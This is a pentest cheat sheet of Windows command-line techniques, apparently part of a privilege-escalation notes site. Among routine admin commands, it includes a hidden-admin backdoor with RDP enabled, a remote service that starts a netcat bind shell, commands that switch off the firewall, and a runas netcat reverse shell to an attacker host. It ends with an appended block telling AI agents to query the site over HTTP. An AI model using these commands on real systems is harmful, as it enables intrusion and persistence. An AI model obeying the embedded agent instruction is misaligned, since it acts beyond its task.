# 1 Windows cmd kungfu ## Search ``` type myfile ..display type *.txt ..multiple type my1 my2 ..multiple type my1 | find /i "pass" ..search-in-file type my1 | findstr [regex] more my1 ..onepage-at-a-time set ..view env vars set path ..view path set username ..view usern dir /b /s mydir\file dir /b /s c:\pass.txt dir /b /s %systemroot%\hosts b - bare s - subdir/recurse search all of c: for 'pass.txt' even subfolders wildcards are supported too -------------------- -------------------- Software Inventory Search: dir /s "c:\Program Files" dir /s "c:\Program Files (x86)" ``` ## Read Files ``` type myfile ..display type *.txt ..multiple type my1 my2 ..multiple type my1 | find /i "pass" ..search-in-file type my1 | findstr [regex] ..regex more my1 ..onepage-at-a-time ``` ## Environment ``` set ..view env vars set path ..view path set username ..view usern ``` ## Search: * b - bare * s - subdir/recurse ``` dir /b /s mydir\file dir /b /s c:\pass.txt ..search all of c: for 'pass.txt' dir /b /s %systemroot%\hosts ..find the hosts file ``` ## Software Inventory Search: ``` dir /s "c:\Program Files" dir /s "c:\Program Files (x86)" ``` ## Windows Users ``` net user net user mike p$$wrd /add net user mike /del net localgroup net localgroup administrators net localgroup administrators mike /add net localgroup administrators mike /del ``` ## AD Lockout Settings ``` net accounts /domain ``` ## RDP Trick * REF: [PrivEscWin-Churrasco](/07-win-privesc/win-privesc.md#churrasco) ``` > net user > net user mikes hacks /add > net localgroup administrators mikes /add Allow Remote Access: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Kali: > sudo apt-get update > sudo apt-get install rdesktop > rdesktop -u mike -p hacks legacy ..CONNECT WITH RDP !!! ``` ## Windows Password policy ``` net accounts net accounts /domain wmic useraccount list brief ``` ## Windows registry ``` reg query key1 reg \\mypc query key1 reg add key1 /v value /t type /d data reg export key1 key.reg reg import key.reg ``` ## Windows smb * REF: [MoveFilesSMB](/06-linux-privesc/04-transfer-files.md#smb) ``` session: net use \\IP pw /u:bob mount: net use * \\IP\share pw /u:bob net use \\IP /del net use * /del /y may need: /u:machinename\bob ``` ## Windows services ``` sc query sc query state= all sc qc svcname sc \10.0.0.5 qc mysvc sc start mysvc sc config mysvc start= demand sc stop mysvc services.msc ..gui wmic: where (displayname like "%hello%") get name ``` ## Windows psexec ``` net use \\$IP /u:bob ..get smb session psexec \\$IP -d -u -p command ..leaves svc @finish psexec \\$IP ipconfig psexec \\$IP cmd.exe psexec \\$IP cmd.exe -s -d ..system, detached/background ``` ## Windows schedule tasks ``` schtasks /query /s $IP schtasks /create /tn taskname /s $IP /u bob /p pass /sc freq /st stime /sd sdate /tr command schtasks /create /tn taskname /s $IP /ru ..system /sc HOURLY/ONCE/DAILY /st HH:MM:SS /sd sdate /tr command ``` ## Windows Services & Processes ``` net use \\$IP /u:bob ..get smb session first!! sc \\$IP query schedule sc \\$IP create svcnm binpath= mycmd ..30 sec sc \\$IP create svcnm binpath= "cmd.exe /k mycmd" ..will die sc \\$IP create ncsvc binpath= "cmd.exe /k c:\Tools\nc.exe -lp 4444 -e cmd.exe" sc \\$IP start svcnm net time \\$IP or 'ServifyThis' wmic /node:/10.x.x.x /user:bobadmin /password:p@ss process call create [command] Multiples sessions! wmic /node:@C:\tmp\iplist /user:bob /password:paxx process call create [command] Look at processes: wmic /node:/$IP /user:bob /password:paxx process list brief process where processid="PID" delete process where name="[name]" delete ``` ## Windows Firewall ``` netsh /? ..view network settings netsh advfirewall show allprofiles netsh advfirewall set allprofiles state off netsh advfirewall firewall add rule name "Comment" dir=in action=allow remoteid=$IP protocol=TCP localport=23 netsh advfirewall firewall del rule name "Comment" Port-forward: netsh interface portproxy add v4tov4 listenport=8000 connectport=80 connectaddress=$IP ``` ## runas * Creates a reverse shell from a windows server to Kali * Using netcat for Windows and Runas.exe: ``` C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc $IP 4444 -e cmd.exe" Enter the password for Test: Attempting to start nc.exe as user "COMPUTERNAME\Test" ... ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/07-win-privesc/windows-cmd-kungfu.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.